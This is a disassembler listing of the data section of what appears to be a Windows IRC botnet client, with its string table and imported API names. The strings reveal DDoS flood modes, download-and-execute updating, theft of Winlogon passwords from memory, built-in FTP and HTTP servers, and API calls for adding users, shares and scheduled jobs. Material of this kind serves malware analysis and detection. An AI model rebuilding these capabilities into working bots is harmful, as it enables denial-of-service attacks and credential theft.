aDdos_random db 'ddos.random',0 ; DATA XREF: sub_4021B5+122�o
; sub_4089DC+2288�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_4021B5+108�o
; sub_4089DC+2274�o
align 10h
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_4021B5+EE�o
; sub_4089DC+2260�o
align 4
aDdosDoneWithFl db '[DDoS]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_402500+5B�o
aDownloadBadUrl db '[DOWNLOAD]: Bad URL, or DNS Error: %s.',0 ; DATA XREF: sub_4025CE+4B6�o
align 4
aDownloadUpda_0 db '[DOWNLOAD]: Update failed: Error executing file: %s.',0
; DATA XREF: sub_4025CE+4A8�o
align 10h
aDownloadDown_0 db '[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.',0
; DATA XREF: sub_4025CE+403�o
aDownloadExecut db '[DOWNLOAD]: Execution failed: Error executing file: %s.',0
; DATA XREF: sub_4025CE:loc_402984�o
aDownloadApplic db '[DOWNLOAD]: Application succesfully executed: %s.',0
; DATA XREF: sub_4025CE+3AC�o
align 4
asc_420AE8: ; DATA XREF: sub_4025CE+346�o
; sub_404EE8+25C�o ...
unicode 0, < >,0
aDownloadOpenni db '[DOWNLOAD]: Openning: %s %s.',0 ; DATA XREF: sub_4025CE+2B4�o
align 4
aDownloadDownlo db '[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.',0
; DATA XREF: sub_4025CE+24E�o
dbl_420B40 dq 9.765625e-4 ; DATA XREF: sub_4025CE+21D�r
; sub_4025CE:loc_40280B�r ...
dbl_420B48 dq 4.294967296e9 ; DATA XREF: sub_4025CE+215�r
; sub_4025CE+237�r ...
aDownloadFilesi db '[DOWNLOAD]: Filesize is incorrect: (%d != %d).',0
; DATA XREF: sub_4025CE+195�o
align 10h
aDownloadUpdate db '[DOWNLOAD]: Update: %s (%dKB transferred).',0
; DATA XREF: sub_4025CE:loc_402731�o
align 4
aDownloadFileDo db '[DOWNLOAD]: File download: %s (%dKB transferred).',0
; DATA XREF: sub_4025CE+15C�o
align 10h
aDownloadCouldn db '[DOWNLOAD]: Couldn',27h,'t open file: %s.',0 ; DATA XREF: sub_4025CE+77�o
aUnknown db 'Unknown',0 ; DATA XREF: sub_402B74:loc_402BB7�o
; sub_4071B2+104�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_402B74:loc_402BB1�o
aDisk db 'Disk',0 ; DATA XREF: sub_402B74:loc_402BAB�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_402B74:loc_402BA5�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_402B74:loc_402B9F�o
align 4
aRam db 'RAM',0 ; DATA XREF: sub_402B74:loc_402B99�o
a?: ; DATA XREF: sub_402B74+1F�o
unicode 0, <?>,0
aFailed db 'failed',0 ; DATA XREF: sub_402C05:loc_402CDD�o
; sub_402D20+2D�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_402C05+6C�o
align 4
aMainSDriveSSTo db '[MAIN]: %s Drive (%s): %s total, %s free, %s available.',0
; DATA XREF: sub_402D20+7B�o
aMainSDriveSFai db '[MAIN]: %s Drive (%s): Failed to stat, device not ready.',0
; DATA XREF: sub_402D20+45�o
align 4
aA db 'A:\',0 ; DATA XREF: sub_402DDF+39�o
aFoundSS db ' Found: %s\%s',0 ; DATA XREF: sub_402F3D+107�o
align 4
aSS_0 db '%s\%s',0 ; DATA XREF: sub_402F3D+45�o
; sub_40E6BB+195�o
align 4
aS_1 db '%s\*',0 ; DATA XREF: sub_402F3D+14�o
align 4
aFindfileFilesF db '[FINDFILE]: Files found: %d.',0 ; DATA XREF: sub_40308F+CF�o
align 4
aFindfileSearch db '[FINDFILE]: Searching for file: %s.',0 ; DATA XREF: sub_40308F+66�o
aMsgina db 'MSGINA',0 ; DATA XREF: sub_4031AF+13E�o
align 4
aNwgina db 'NWGINA',0 ; DATA XREF: sub_4031AF+123�o
align 10h
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_4031AF+B9�o
align 10h
aFindpassTheWin db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_4035FB+6A�o
; sub_40368D+A3�o
db ' \\%S, User: (%S/%S).',0
align 4
aFindpassTheW_0 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_40368D+C5�o
db ' \\%S, User: (%S/(N/A)).',0
align 4
aFindpassFailed db '[FINDPASS]: Failed to enable Debug Privilege.',0
; DATA XREF: sub_40378E:loc_403905�o
align 4
aFindpassUnab_0 db '[FINDPASS]: Unable to find Winlogon Process ID.',0
; DATA XREF: sub_40378E:loc_4038D9�o
aFindpassUnable db '[FINDPASS]: Unable to find the password in memory.',0
; DATA XREF: sub_40378E:loc_4038D2�o
align 4
aFindpassTheW_1 db '[FINDPASS]: The Windows logon (Pid: <%d>) information is: Domain:'
; DATA XREF: sub_40378E+116�o
db ' \\%S, User: (%S/(no password)).',0
align 4
aUserdomain: ; DATA XREF: sub_40378E+DB�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_40378E+CD�o
unicode 0, <USERNAME>,0
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_40378E+99�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_40378E+8C�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_40378E+7F�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_40378E+72�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_40378E+67�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_40378E+54�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_40378E+40�o
; sub_40378E+160�o ...
align 4
aFindpassOnlySu db '[FINDPASS]: Only supported on Windows NT/2000.',0
; DATA XREF: sub_40378E+35�o
align 4
a221Goodbye_ db '221 Goodbye.',0Ah,0 ; DATA XREF: sub_403BFF+542�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_403BFF+531�o
; sub_4089DC+5DA�o
align 10h
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_403BFF+528�o
align 4
aFtpFileTransfe db '[FTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_403BFF+4DC�o
align 4
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_403BFF+4C1�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_403BFF+491�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_403BFF:loc_404079�o
align 10h
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_403BFF+470�o
align 10h
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_403BFF+45E�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_403BFF+42A�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_403BFF+3EC�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_403BFF:loc_403FB5�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_403BFF+38E�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_403BFF:loc_403F7B�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_403BFF+350�o
align 10h
aPasv db 'PASV',0 ; DATA XREF: sub_403BFF:loc_403F3C�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_403BFF+333�o
aI: ; DATA XREF: sub_403BFF+31E�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_403BFF+302�o
aA_0: ; DATA XREF: sub_403BFF+2ED�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_403BFF:loc_403ED8�o
align 10h
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_403BFF+2CF�o
align 10h
off_4211C0 dd offset dword_445750 ; DATA XREF: sub_403BFF+2BD�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_403BFF+2B1�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_403BFF:loc_403E9D�o
align 10h
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_403BFF+294�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: sub_403BFF:loc_403E80�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_403BFF+277�o
align 10h
aPass db 'PASS',0 ; DATA XREF: sub_403BFF:loc_403E63�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_403BFF+25A�o
align 10h
aUser_0 db 'USER',0 ; DATA XREF: sub_403BFF+247�o
align 4
aSS_1 db '%s %s',0 ; DATA XREF: sub_403BFF+236�o
align 10h
a220Winftpd1_2 db '220 WinFtpd 1.2',0Ah,0 ; DATA XREF: sub_403BFF+1BA�o
align 4
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_4041A6+6BB�o
align 10h
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041A6+6A6�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_4041A6+68B�o
align 4
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_4041A6+5F1�o
align 8
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_4041A6+5C9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_4041A6:loc_404727�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_4041A6+57A�o
align 4
aSS db '%s%s',0 ; DATA XREF: sub_4041A6+523�o
; sub_404C2E+E6�o ...
align 10h
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_4041A6+4C5�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_4041A6+484�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_4041A6+451�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_4041A6:loc_4045B9�o
align 4
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_4041A6+40C�o
align 4
aSS_2 db '%s%s/',0 ; DATA XREF: sub_4041A6+3B5�o
align 10h
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041A6+36C�o
; sub_4041A6+4DA�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_4041A6+33B�o
align 4
aS_0 db '<%s>',0 ; DATA XREF: sub_4041A6+311�o
; sub_4041A6+463�o
align 4
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_4041A6+2E5�o
aAm db 'AM',0 ; DATA XREF: sub_4041A6+2C4�o
; .data:0042E1B0�o
align 4
aPm db 'PM',0 ; DATA XREF: sub_4041A6+2B9�o
; .data:0042E1B4�o
align 4
a__0: ; DATA XREF: sub_4041A6+27C�o
unicode 0, <.>,0
a__ db '..',0 ; DATA XREF: sub_4041A6+264�o
align 8
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041A6+1F0�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4041A6+15C�o
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041A6+144�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_4041A6+107�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_4041A6+B4�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_4041A6+75�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4041A6+3F�o
asc_4216D8: ; DATA XREF: sub_4041A6+1E�o
; sub_404C2E+F7�o ...
dw 0Ah
unicode 0, <>,0
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_404999+8A�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
align 8
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_404AC0+E4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_404AC0+CA�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_404AC0+94�o
; sub_4116D2+17D�o ...
align 10h
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_404AC0+7B�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_404AC0:loc_404B28�o
align 10h
aTextHtml db 'text/html',0 ; DATA XREF: sub_404AC0+61�o
align 4
aHttpdFailedT_0 db '[HTTPD]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_404C2E+287�o
align 4
aHttpdWorkerThr db '[HTTPD]: Worker thread of server thread: %d.',0
; DATA XREF: sub_404C2E+213�o
align 4
asc_421994: ; DATA XREF: sub_404C2E+16E�o
unicode 0, <*>,0
aS_2 db '%s',0 ; DATA XREF: sub_404C2E+31�o
; sub_4056BF+44�o ...
align 4
aS_8 db '\%s',0 ; DATA XREF: sub_404C2E+27�o
aHttpdErrorServ db '[HTTPD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_404EE8+3E0�o
align 10h
asc_4219D0 db 0Dh,0Ah,0 ; DATA XREF: sub_404EE8+296�o
align 4
aGet db 'GET ',0 ; DATA XREF: sub_404EE8+22D�o
align 10h
aIcmpErrorSendi db '[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Return'
; DATA XREF: sub_40532B+2F2�o
db 'ed: <%d>.',0
align 10h
aIcmpDoneWithSF db '[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/s'
; DATA XREF: sub_40532B+288�o
db 'ec (%dMB).',0
aIcmpInvalidTar db '[ICMP]: Invalid target IP.',0 ; DATA XREF: sub_40532B+B6�o
align 4
aIcmpErrorSetso db '[ICMP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_40532B+8E�o
aIcmpErrorSocke db '[ICMP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_40532B+49�o
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_4056BF+69�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_4056BF+16�o
; sub_4089DC+700�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_4056BF+F�o
; sub_4089DC+70E�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_405770+B8C�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_405770+B7F�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_405770+B72�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_405770+B65�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_405770+B58�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_405770+B50�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_405770:loc_4062B3�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_405770+B0E�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_405770+B06�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_405770:loc_406269�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_405770+AB4�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_405770+AA7�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_405770+A9A�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_405770+A92�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_405770:loc_4061F5�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_405770+A50�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_405770+A48�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_405770:loc_4061AB�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_405770+A06�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_405770+9FE�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_405770:loc_406161�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_405770+974�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_405770+967�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_405770+95A�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_405770+94D�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_405770+940�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_405770+933�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_405770+926�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_405770+919�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_405770+90C�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_405770+8FF�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_405770+8F7�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_405770:loc_406056�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_405770+8A9�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_405770+89C�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_405770+894�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_405770:loc_405FF7�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_405770+85A�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_405770+7E8�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_405770+7DB�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_405770+7CE�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_405770+7C1�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_405770+7B4�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_405770+7A7�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_405770+79A�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_405770+78D�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_405770+780�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_405770+778�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_405770:loc_405ED7�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_405770+62E�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_405770+621�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_405770+614�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_405770+607�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_405770+5FA�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_405770+5ED�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_405770+5E0�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_405770+5D3�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_405770+5C6�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_405770+5B9�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_405770+5B1�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_405770+59F�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_405770+592�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_405770+585�o
align 4
aSend db 'send',0 ; DATA XREF: sub_405770+578�o
; sub_4089DC+1DE4�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_405770+56B�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_405770+55E�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_405770+551�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_405770+544�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_405770+537�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_405770+52A�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_405770+51D�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_405770+510�o
aSocket db 'socket',0 ; DATA XREF: sub_405770+503�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_405770+4F6�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_405770+4E9�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_405770+4DC�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_405770+4CF�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_405770+4C2�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_405770+4B5�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_405770+4AD�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_405770+49C�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_405770+429�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_405770+41C�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_405770+40F�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_405770+402�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_405770+3F5�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_405770+3E8�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_405770+3DB�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_405770+3CE�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_405770+3C6�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_405770:loc_405B25�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_405770:loc_405AFD�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_405770+335�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_405770+328�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_405770+31B�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_405770+30E�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_405770+301�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_405770+2F4�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_405770+2E7�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_405770:loc_405A4F�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_405770+2AF�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_405770+2A2�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_405770:loc_405A0A�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_405770+252�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_405770+245�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_405770+238�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_405770+22B�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_405770+21E�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_405770+216�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_405770:loc_405975�o
align 10h
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_405770+1A0�o
align 10h
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_405770+193�o
align 10h
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_405770+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_405770+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_405770+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_405770+15F�o
align 10h
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_405770+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_405770+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_405770:loc_4058A5�o
; sub_41E283+13�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_405770:loc_405878�o
align 10h
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_405770+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_405770+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_405770+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_405770+79�o
align 10h
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_405770+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_405770+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_405770+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_405770+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_405770+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_405770+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_405770+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_405770+A�o
; sub_41CFB8+1E�o
align 4
